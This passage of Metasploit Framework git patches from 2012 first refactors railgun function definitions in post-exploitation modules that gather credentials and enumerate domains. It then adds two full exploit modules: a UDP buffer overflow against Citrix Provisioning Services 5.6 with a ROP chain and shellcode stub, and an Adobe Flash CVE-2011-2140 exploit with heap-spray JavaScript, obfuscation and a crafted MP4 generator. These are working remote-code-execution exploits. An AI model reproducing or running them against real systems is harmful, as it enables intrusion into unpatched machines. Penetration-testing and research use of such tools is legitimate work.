.../gather/credentials/enum_picasa_pwds.rb | 12 ------ .../windows/gather/credentials/outlook.rb | 12 ------ modules/post/windows/gather/enum_domains.rb | 26 ------------ modules/post/windows/gather/reverse_lookup.rb | 6 --- .../recon/computer_browser_discovery.rb | 41 ------------------- .../post/windows/recon/resolve_hostname.rb | 1 - 10 files changed, 22 insertions(+), 114 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb index d4a8299319..ad62b0f5f3 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb @@ -21,6 +21,17 @@ class Def_netapi32 ["PDWORD","lpNameBugger","out"], ["PDWORD","BufferType","out"] ]) + dll.add_function('NetServerEnum', 'DWORD',[ + ["PWCHAR","servername","in"], + ["DWORD","level","in"], + ["PDWORD","bufptr","out"], + ["DWORD","prefmaxlen","in"], + ["PDWORD","entriesread","out"], + ["PDWORD","totalentries","out"], + ["DWORD","servertype","in"], + ["PWCHAR","domain","in"], + ["DWORD","resume_handle","inout"] + ]) return dll end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb index 01aed5e7ad..a35e0a3fcc 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb @@ -18,6 +18,12 @@ class Def_ws2_32 ["PDWORD","ppResult","out"] ]) + dll.add_function('gethostbyaddr', 'DWORD', [ + ['PCHAR', 'addr', 'in'], + ['DWORD','len','in'], + ['DWORD','type','in'] + ]) + dll.add_function('WSAAccept', 'DWORD',[ ["DWORD","s","in"], ["PBLOB","addr","inout"], diff --git a/modules/post/windows/escalate/net_runtime_modify.rb b/modules/post/windows/escalate/net_runtime_modify.rb index 77699a5e64..2b0a6d4a75 100644 --- a/modules/post/windows/escalate/net_runtime_modify.rb +++ b/modules/post/windows/escalate/net_runtime_modify.rb @@ -124,16 +124,10 @@ class Metasploit3 < Msf::Post def init_railgun begin - # load the dlls we need - if session.railgun.get_dll("advapi32").nil? - print_status("Loading advapi.dll...") - session.railgun.add_dll("advapi32", 'C:\\WINDOWS\\system32\\advapi32.dll') - end - - if session.railgun.advapi32.functions['DeleteService'].nil? - session.railgun.add_function( 'advapi32', 'DeleteService','BOOL',[ - [ "DWORD", "hService", "in" ]]) - end + rg = session.railgun + if (!rg.get_dll('advapi32')) + rg.add_dll('advapi32') + end rescue Exception => e print_error("Could not initalize railgun") print_error("Railgun Error: #{e}") diff --git a/modules/post/windows/escalate/service_permissions.rb b/modules/post/windows/escalate/service_permissions.rb index 3cfb2cf1dc..68fb61d4c8 100644 --- a/modules/post/windows/escalate/service_permissions.rb +++ b/modules/post/windows/escalate/service_permissions.rb @@ -110,12 +110,7 @@ class Metasploit3 < Msf::Post end #attempt to make new service - client.railgun.kernel32.LoadLibraryA("advapi32.dll") - client.railgun.get_dll('advapi32') - client.railgun.add_function( 'advapi32', 'DeleteService','BOOL',[ - [ "DWORD", "hService", "in" ] - ]) - + #SERVICE_NO_CHANGE 0xffffffff for DWORDS or NULL for pointer values leaves the current config print_status("Trying to add a new service...") diff --git a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb index 99ab957903..49cc85c0e2 100644 --- a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb +++ b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb @@ -45,18 +45,6 @@ class Metasploit3 < Msf::Post if (!rg.get_dll('crypt32')) rg.add_dll('crypt32') end - - if (!rg.crypt32.functions["CryptUnprotectData"]) - rg.add_function("crypt32", "CryptUnprotectData", "BOOL", [ - ["PBLOB","pDataIn", "in"], - ["PWCHAR", "szDataDescr", "out"], - ["PBLOB", "pOptionalEntropy", "in"], - ["PDWORD", "pvReserved", "in"], - ["PBLOB", "pPromptStruct", "in"], - ["DWORD", "dwFlags", "in"], - ["PBLOB", "pDataOut", "out"] - ]) - end end diff --git a/modules/post/windows/gather/credentials/outlook.rb b/modules/post/windows/gather/credentials/outlook.rb index 5e5e92e5c4..1d5211be41 100644 --- a/modules/post/windows/gather/credentials/outlook.rb +++ b/modules/post/windows/gather/credentials/outlook.rb @@ -41,18 +41,6 @@ class Metasploit3 < Msf::Post if (!rg.get_dll('crypt32')) rg.add_dll('crypt32') end - - if (!rg.crypt32.functions["CryptUnprotectData"]) - rg.add_function("crypt32", "CryptUnprotectData", "BOOL", [ - ["PBLOB","pDataIn", "in"], - ["PWCHAR", "szDataDescr", "out"], - ["PBLOB", "pOptionalEntropy", "in"], - ["PDWORD", "pvReserved", "in"], - ["PBLOB", "pPromptStruct", "in"], - ["DWORD", "dwFlags", "in"], - ["PBLOB", "pDataOut", "out"] - ]) - end end diff --git a/modules/post/windows/gather/enum_domains.rb b/modules/post/windows/gather/enum_domains.rb index 843aa4102b..9ec30cb134 100644 --- a/modules/post/windows/gather/enum_domains.rb +++ b/modules/post/windows/gather/enum_domains.rb @@ -25,32 +25,6 @@ class Metasploit3 < Msf::Post end def run - #structure -=begin - NET_API_STATUS NetServerEnum( - __in_opt LPCWSTR servername, - __in DWORD level, - __out LPBYTE *bufptr, - __in DWORD prefmaxlen, - __out LPDWORD entriesread, - __out LPDWORD totalentries, - __in DWORD servertype, - __in_opt LPCWSTR domain, - __inout_opt LPDWORD resume_handle - ); -=end - - client.railgun.add_function('netapi32', 'NetServerEnum', 'DWORD',[ - ['PWCHAR','servername','in'], - ['DWORD','level','in'], - ['PDWORD','bufptr','out'], - ['DWORD','prefmaxlen','in'], - ['PDWORD','entriesread','out'], - ['PDWORD','totalentries','out'], - ['DWORD','servertype','in'], - ['PWCHAR','domain','in'], - ['PDWORD','resume_handle','inout'] - ]) domain_enum = 2147483648 # SV_TYPE_DOMAIN_ENUM = hex 80000000 buffersize = 500 diff --git a/modules/post/windows/gather/reverse_lookup.rb b/modules/post/windows/gather/reverse_lookup.rb index c03925e4f6..10b2b760ec 100644 --- a/modules/post/windows/gather/reverse_lookup.rb +++ b/modules/post/windows/gather/reverse_lookup.rb @@ -53,12 +53,6 @@ class Metasploit3 < Msf::Post end end - #Initialize Railgun 'gethostbyaddr' call' - session.railgun.add_function('ws2_32', 'gethostbyaddr', 'DWORD', [ - ['PCHAR', 'addr', 'in'], - ['DWORD','len','in'], - ['DWORD','type','in']]) - #Generates IP list based on RHOSTS - RangeWalker rocks.... iplist = Rex::Socket::RangeWalker.new(datastore['RHOSTS']) diff --git a/modules/post/windows/recon/computer_browser_discovery.rb b/modules/post/windows/recon/computer_browser_discovery.rb index 5e4c355100..9c32f85217 100644 --- a/modules/post/windows/recon/computer_browser_discovery.rb +++ b/modules/post/windows/recon/computer_browser_discovery.rb @@ -68,47 +68,6 @@ class Metasploit3 < Msf::Post ### MAIN ### client = session -=begin -NET_API_STATUS NetUserEnum( - __in LPCWSTR servername, - __in DWORD level, - __in DWORD filter, - __out LPBYTE *bufptr, - __in DWORD prefmaxlen, - __out LPDWORD entriesread, - __out LPDWORD totalentries, - __inout LPDWORD resume_handle -); - -client.railgun.add_function( 'netapi32', 'NetUserEnum', 'DWORD',[ -["PWCHAR","servername","in"], -["DWORD","level","in"], -["DWORD","filter","in"], -["PDWORD","bufptr","out"], -["DWORD","prefmaxlen","in"], -["PDWORD","entriesread","out"], -["PDWORD","totalentries","out"], -["PDWORD","resume_handle","inout"]]) - -=end - - client.railgun.add_function( - 'netapi32', 'NetServerEnum', 'DWORD', - [ - ["PBLOB","servername","in"], ["DWORD","level","in"], ["PDWORD","bufptr","out"], - ["DWORD","prefmaxlen","in"], ["PDWORD","entriesread","out"], ["PDWORD","totalentries","out"], - ["DWORD","servertype","in"], ["PWCHAR","domain","in"], ["DWORD","resume_handle","inout"] - ] - ) - - client.railgun.add_function( - 'ws2_32', 'getaddrinfo', 'DWORD', - [ - ["PCHAR","pNodeName","in"], ["PCHAR","pServiceName","in"], - ["PDWORD","pHints","in"], ["PDWORD","ppResult","out"] - ] - ) - domain = nil # Default = SV_TYPE_NT diff --git a/modules/post/windows/recon/resolve_hostname.rb b/modules/post/windows/recon/resolve_hostname.rb index 4246a8ebc1..e0dcd85148 100644 --- a/modules/post/windows/recon/resolve_hostname.rb +++ b/modules/post/windows/recon/resolve_hostname.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Post def run ### MAIN ### - client.railgun.add_function( 'ws2_32', 'getaddrinfo', 'DWORD',[["PCHAR","pNodeName","in"],["PCHAR","pServiceName","in"],["PDWORD","pHints","in"],["PDWORD","ppResult","out"]]) if client.platform =~ /^x64/ size = 64 From 3312a16708fadd7e35c67af0264810297f2e6033 Mon Sep 17 00:00:00 2001 From: Rob Fuller Date: Thu, 9 Feb 2012 05:49:40 +0000 Subject: [PATCH 09/15] Added a message when backgrounding a session --- lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index 492ecb0939..0a85d3ce1f 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb @@ -83,6 +83,7 @@ class Console::CommandDispatcher::Core end def cmd_background + print_status "Backgrounding session #{client.name}..." client.interacting = false end From 2bd330da337053510f14ca8118aa3435a8e974a2 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 10 Feb 2012 00:06:48 -0600 Subject: [PATCH 10/15] Add ZDI-12-009 Citrix Provisioning Services 5.6 streamprocess buffer overflow exploit --- .../misc/citrix_streamprocess_data_msg.rb | 116 ++++++++++++++++++ 1 file changed, 116 insertions(+) create mode 100644 modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb diff --git a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb new file mode 100644 index 0000000000..5a2ea1be72 --- /dev/null +++ b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb @@ -0,0 +1,116 @@ +## +# $Id: $ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Udp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow', + 'Description' => %q{ + This module exploits a remote buffer overflow in the Citrix Provisioning Services + 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet to the + 6905/UDP port. The module has been successfully tested on Windows Server 2003 SP2, + Windows 7, and Windows XP SP3. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'AbdulAziz Hariri', # Initial discovery via ZDI + 'alino <26alino[at]gmail.com>' # Metasploit module + ], + 'Version' => '$Revision: $', + 'References' => + [ + ['BID', '49803'], + ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-009'], + ['URL', 'http://support.citrix.com/article/CTX130846'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + 'InitialAutoRunScript' => 'migrate -f', + }, + 'Payload' => + { + 'BadChars' => "\x00", + 'EncoderOptions' => {'BufferRegister'=>'ECX'}, + }, + 'Platform' => ['win'], + 'Targets' => + [ + [ 'Citrix Provisioning Services 5.6 SP1', + { + 'Offset' => 2012, + 'Ret' => 0x0045403a # ADD ESP,664; RETN 04 streamprocess.exe + } + ] + ], + 'Privileged' => true, + 'DisclosureDate' => 'Nov 04 2011', #CTX130846 creation date + 'DefaultTarget' => 0)) + + register_options([Opt::RPORT(6905)], self.class) + end + + def exploit + + packet = "\x00\x00\x02\x40" # DATA MSG + packet << rand_text_alpha_upper(18) + packet << "\x00\x00\x00\x00" # Length + packet << rand_text_alpha_upper(target['Offset']) + packet << [target.ret].pack('V') + + rop_nop = [0x004a072c].pack('V') * 38 # RETN streamprocess.exe + + rop_gadgets = + [ + 0x0045b141, # POP EAX; RETN streamprocess.exe + 0x1009a1bc, # VirtualProtect() + 0x00436d44, # MOV EAX,DWORD PTR DS:[EAX]; RETN streamprocess.exe + 0x004b0bbe, # XCHG EAX,ESI; RETN streamprocess.exe + 0x004ad0cf, # POP EBP; RETN streamprocess.exe + 0x00455d9d, # PUSH ESP; RETN streamprocess.exe + 0x00497f5a, # POP EAX; RETN streamprocess.exe + 0xfffff9d0, # dwSize + 0x00447669, # NEG EAX; RETN streamprocess.exe + 0x004138a7, # ADD EBX,EAX; XOR EAX,EAX; RETN streamprocess.exe + 0x00426305, # POP ECX; RETN streamprocess.exe + 0x00671fb9, # lpflOldProtect + 0x004e41e6, # POP EDI; RETN streamprocess.exe + 0x0040f004, # RETN streamprocess.exe + 0x00495c05, # POP EAX; RETN streamprocess.exe + 0xffffffc0, # flNewProtect + 0x0042c79a, # NEG EAX; RETN streamprocess.exe + 0x0049b676, # XCHG EAX,EDX; RETN streamprocess.exe + 0x0045c1fa, # POP EAX; RETN streamprocess.exe + 0x90909090, # NOP + 0x00435bbe, # PUSHAD; RETN streamprocess.exe + ].pack("V*") + + packet[258, rop_nop.length] = rop_nop + packet[410, rop_gadgets.length] = rop_gadgets + packet[494, 10] = "\xeb\x03\x59\xff\xd1\xe8\xf8\xff\xff\xff" + packet[504, payload.encoded.length] = payload.encoded + + print_status("Trying target #{target.name}...") + + connect_udp + udp_sock.put(packet) + + handler + disconnect_udp + end +end \ No newline at end of file From e5ea2961f546f43947d03b19dd83911207ad6109 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 10 Feb 2012 00:10:28 -0600 Subject: [PATCH 11/15] Add CVE-2011-2140 Adobe Flash SequenceParameterSetNALUnit (mp4) bof --- .../windows/browser/adobe_flash_sps.rb | 326 ++++++++++++++++++ 1 file changed, 326 insertions(+) create mode 100644 modules/exploits/windows/browser/adobe_flash_sps.rb diff --git a/modules/exploits/windows/browser/adobe_flash_sps.rb b/modules/exploits/windows/browser/adobe_flash_sps.rb new file mode 100644 index 0000000000..3842483c90 --- /dev/null +++ b/modules/exploits/windows/browser/adobe_flash_sps.rb @@ -0,0 +1,326 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer::HTML + + def initialize(info={}) + super(update_info(info, + 'Name' => "Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow", + 'Description' => %q{ + This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx + component. When processing a MP4 file (specifically the Sequence Parameter Set), + Flash will see if pic_order_cnt_type is equal to 1, which sets the + num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in + offset_for_ref_frame on the stack, which allows arbitrary remote code execution + under the context of the user. Numerous reports also indicate that this + vulnerability has been exploited in the wild. + + Please note that the exploit requires a SWF media player in order to trigger + the bug, which currently isn't included in the framework. However, software such + as Longtail SWF Player is free for non-commercial use, and is easily obtainable. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Alexander Gavrun', #RCA + 'Abysssec', #PoC + 'sinn3r' #Metasploit + ], + 'References' => + [ + [ 'CVE', '2011-2140' ], + [ 'BID', '49083' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-276/' ], + [ 'URL', 'http://www.kahusecurity.com/2011/cve-2011-2140-caught-in-the-wild/' ], + [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-21.html' ], + [ 'URL', 'http://0x1byte.blogspot.com/2011/11/analysis-of-cve-2011-2140-adobe-flash.html' ], + [ 'URL', 'http://www.abysssec.com/blog/2012/01/31/exploiting-cve-2011-2140-another-flash-player-vulnerability/' ] + ], + 'Payload' => + { + 'BadChars' => "\x00", + 'StackAdjustment' => -3500 + }, + 'DefaultOptions' => + { + 'ExitFunction' => "seh", + 'InitialAutoRunScript' => 'migrate -f' + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', {} ], + [ 'IE 6 on Windows XP SP3', { 'Offset' => '0x600' } ], #0x5f4 = spot on + [ 'IE 7 on Windows XP SP3 / Vista', { 'Offset' => '0x600' } ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Apr 1 2011", + 'DefaultTarget' => 0)) + + register_options( + [ + OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']), + OptString.new('SWF_PLAYER_URI', [true, 'Path to the SWF Player']) + ], self.class) + end + + def get_target(agent) + #If the user is already specified by the user, we'll just use that + return target if target.name != 'Automatic' + + if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/ + return targets[1] + elsif agent =~ /MSIE 7/ + return targets[2] + else + return nil + end + end + + def on_request_uri(cli, request) + agent = request.headers['User-Agent'] + my_target = get_target(agent) + + # Avoid the attack if the victim doesn't have the same setup we're targeting + if my_target.nil? + print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}") + send_not_found(cli) + return + end + + # The SWF requests our MP4 trigger + if request.uri =~ /\.mp4$/ + print_status("Sending MP4 to #{cli.peerhost}:#{cli.peerport}...") + #print_error("Sorry, not sending you the mp4 for now") + #send_not_found(cli) + send_response(cli, @mp4, {'Content-Type'=>'video/mp4'}) + return + end + + # Set payload depending on target + p = payload.encoded + + js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) + js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) + + js = <<-JS + var heap_obj = new heapLib.ie(0x20000); + var code = unescape("#{js_code}"); + var nops = unescape("#{js_nops}"); + + while (nops.length < 0x80000) nops += nops; + var offset = nops.substring(0, #{my_target['Offset']}); + var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); + + while (shellcode.length < 0x40000) shellcode += shellcode; + var block = shellcode.substring(0, (0x80000-6)/2); + + heap_obj.gc(); + + for (var i=1; i < 0x300; i++) { + heap_obj.alloc(block); + } + JS + + js = heaplib(js, {:noobfu => true}) + + if datastore['OBFUSCATE'] + js = ::Rex::Exploitation::JSObfu.new(js) + js.obfuscate + end + + myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'] + mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4" + swf_uri = "#{datastore['SWF_PLAYER_URI']}?autostart=true&image=video.jpg&file=#{mp4_uri}" + + html = %Q| + + + + + + + + + + + | + + html = html.gsub(/^\t\t/, '') + + print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...") + send_response(cli, html, {'Content-Type'=>'text/html'}) + end + + def exploit + @mp4 = create_mp4 + super + end + + def create_mp4 + ftypAtom = "\x00\x00\x00\x20" #Size + ftypAtom << "ftypisom" + ftypAtom << "\x00\x00\x02\x00" + ftypAtom << "isomiso2avc1mp41" + + mdatAtom = "\x00\x00\x00\x10" #Size + mdatAtom << "mdat" + mdatAtom << "\x00\x00\x02\x8B\x06\x05\xFF\xFF" + + moovAtom1 = "\x00\x00\x08\x83" #Size + moovAtom1 << "moov" #Move header box header + moovAtom1 << "\x00\x00\x00" + moovAtom1 << "lmvhd" # Type + moovAtom1 << "\x00\x00\x00\x00" # Version/Flags + moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time + moovAtom1 << "\x00\x00\x03\xE8" # Time scale + moovAtom1 << "\x00\x00\x2F\x80" # Duration + moovAtom1 << "\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + moovAtom1 << "\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00" + moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x02\xFA" + moovAtom1 << "trak" # Track box header + moovAtom1 << "\x00\x00\x00\x5C" + moovAtom1 << "tkhd" + moovAtom1 << "\x00\x00\x00\x0F" + moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time + moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x2E\xE0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + moovAtom1 << "\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + moovAtom1 << "\x00\x00\x00\x00\x40\x00\x00\x00\x01\x42\x00\x00\x01\x42\x00\x00\x00\x00\x02" + moovAtom1 << "rmdia" + moovAtom1 << "\x00\x00\x00\x20" # Size + moovAtom1 << "mdhd" # Media header box + moovAtom1 << "\x00\x00\x00\x00" # Version/Flags + moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time + moovAtom1 << "\x00\x00\x00\x01" # Time scale + moovAtom1 << "\x00\x00\x00\x0C" # Duration + moovAtom1 << "\x55\xC4\x00\x00" + moovAtom1 << "\x00\x00\x00\x2D" # Size + moovAtom1 << "hdlr" # Handler Reference header + moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00" + moovAtom1 << "vide" # Handler type + moovAtom1 << "\x00\x00\x00\x00\x00" + moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00" + moovAtom1 << "VideoHandler" # Handler name + moovAtom1 << "\x00\x00\x00\x02\x1D" + moovAtom1 << "minf" + moovAtom1 << "\x00\x00\x00\x14" + moovAtom1 << "vmhd" + moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24" + moovAtom1 << "dinf" # Data information box header + moovAtom1 << "\x00\x00\x00\x1c" + moovAtom1 << "dref" # Data reference box + moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01" + moovAtom1 << "\x00\x00\x00\x0C" # Size + moovAtom1 << "url " # Data entry URL box + moovAtom1 << "\x00\x00\x00\x01" # Location / version / flags + moovAtom1 << "\x00\x00\x09\xDD" # Size + moovAtom1 << "stbl" + moovAtom1 << "\x00\x00\x08\x99" + moovAtom1 << "stsd" + moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01" + moovAtom1 << "\x00\x00\x08\x89" # Size + moovAtom1 << "avc1" + moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + moovAtom1 << "\x01\x42" # Width + moovAtom1 << "\x01\x42" # Height + moovAtom1 << "\x00\x48\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + moovAtom1 << "\x18" # Depth + moovAtom1 << "\xFF\xFF" + moovAtom1 << "\x00\x00\x08\x33" # Size + moovAtom1 << "avcC" + moovAtom1 << "\x01" # Config version + moovAtom1 << "\x64" # Avc profile indication + moovAtom1 << "\x00" # Compatibility + moovAtom1 << "\x15" # Avc level indication + moovAtom1 << "\xFF\xE1" + + # Although the fields have different values, they all become 0x0c0c0c0c + # in memory. + cycle = "\x00\x00\x00" + cycle << "\x30\x30\x30\x30" #6th + cycle << "\x00\x00\x00" + cycle << "\x18\x18\x18\x18" #7th + cycle << "\x00\x00\x00" + cycle << "\x0c\x0c\x0c\x0c" #8th + cycle << "\x00\x00\x00" + cycle << "\x06\x06\x06\x06" #1st + cycle << "\x00\x00\x00" + cycle << "\x03\x03\x03\x03" + cycle << "\x00\x00\x00\x01\x81\x81\x81\x80\x00\x00\x00" + cycle << "\xc0\xc0\xc0\xc0" # 4th + cycle << "\x00\x00\x00" + cycle << "\x60\x60\x60\x60" + + spsunit = "\x08\x1A\x67\x70\x34\x32\x74\x70\x00\x00\xAF\x88\x88\x84\x00\x00\x03\x00\x04\x00\x00\x03\x00\x3F\xFF\xFF\xFF\xFF\xFF" + spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" + spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFC" + spsunit << cycle * 35 + spsunit << "\x00\x00\x00\x30\x30\x03\x03\x03\x03\x00\x00\x00\xB2\x2C" + + moovAtom2 = "\x00\x00\x00\x18" + moovAtom2 << "stts" + moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x00\x00\x00\x01" + moovAtom2 << "\x00\x00\x00\x14" + moovAtom2 << "stss" + moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00" + moovAtom2 << "pctts" + moovAtom2 << "\x00\x00\x00\x00\x00\x00" + moovAtom2 << "\x00\x0C\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00" + moovAtom2 << "\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x02" + moovAtom2 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00" + moovAtom2 << "\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x02" + moovAtom2 << "\x00\x00\x00\x1C" + moovAtom2 << "stsc" + moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01" + moovAtom2 << "\x00\x00\x00\x44" + moovAtom2 << "stsz" + moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + moovAtom2 << "\x0C\x00\x00\x2F\x8D\x00\x00\x0C\xFE\x00\x00\x04\x42\x00\x00\x0B\x20\x00\x00\x04\x58\x00\x00\x07\x19\x00\x00\x07" + moovAtom2 << "\x63\x00\x00\x02\xD6\x00\x00\x03\xC1\x00\x00\x0A\xDF\x00\x00\x04\x9B\x00\x00\x09\x39" + moovAtom2 << "\x00\x00\x00\x40" + moovAtom2 << "stco" + moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x0C\x00\x00\x00\x30\x00\x00\x2F\xBD\x00\x00\x3D\x8A\x00\x00\x48\x19\x00\x00\x5A\xF4" + moovAtom2 << "\x00\x00\x66\x1F\x00\x00\x73\xEA\x00\x00\x82\x32\x00\x00\x8A\xFA\x00\x00\x95\x51\x00\x00\xA7\x16\x00\x00\xB1\xE5" + + moovAtom = moovAtom1 + spsunit + moovAtom2 + m = ftypAtom + mdatAtom + moovAtom + return m + end + +end + +=begin +C:\WINDOWS\system32\Macromed\Flash\Flash10u.ocx + +Flash10u+0x5b4e8: +Missing image name, possible paged-out or corrupt data. +1f06b4e8 8901 mov dword ptr [ecx],eax ds:0023:020c0000=00905a4d +0:008> !exchain +020bfdfc: +c0c0c0b (0c0c0c0c) + +ECX points to 0x0c0c0c0c at the time of the crash: +0:008> r +eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000 +eip=0c0c0c0c esp=020befa8 ebp=020befc8 iopl=0 nv up ei pl zr na pe nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050246 ++0xc0c0c0b: +0c0c0c0c ?? ??? + +Example of SWF player URI: +http://www.jeroenwijering.com/embed/mediaplayer.swf + +To-do: +IE 8 target +=end \ No newline at end of file From 5ea20a332bc9a104a4b10a94177880811897f82c Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 10 Feb 2012 00:13:39 -0600 Subject: [PATCH 12/15] Clearly I had the wrong disclosure date. This one is based on Adobe's security bulletin. --- modules/exploits/windows/browser/adobe_flash_sps.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flash_sps.rb b/modules/exploits/windows/browser/adobe_flash_sps.rb index 3842483c90..e583d8459c 100644 --- a/modules/exploits/windows/browser/adobe_flash_sps.rb +++ b/modules/exploits/windows/browser/adobe_flash_sps.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'IE 7 on Windows XP SP3 / Vista', { 'Offset' => '0x600' } ] ], 'Privileged' => false, - 'DisclosureDate' => "Apr 1 2011", + 'DisclosureDate' => "Aug 9 2011", 'DefaultTarget' => 0)) register_options( @@ -323,4 +323,4 @@ http://www.jeroenwijering.com/embed/mediaplayer.swf To-do: IE 8 target -=end \ No 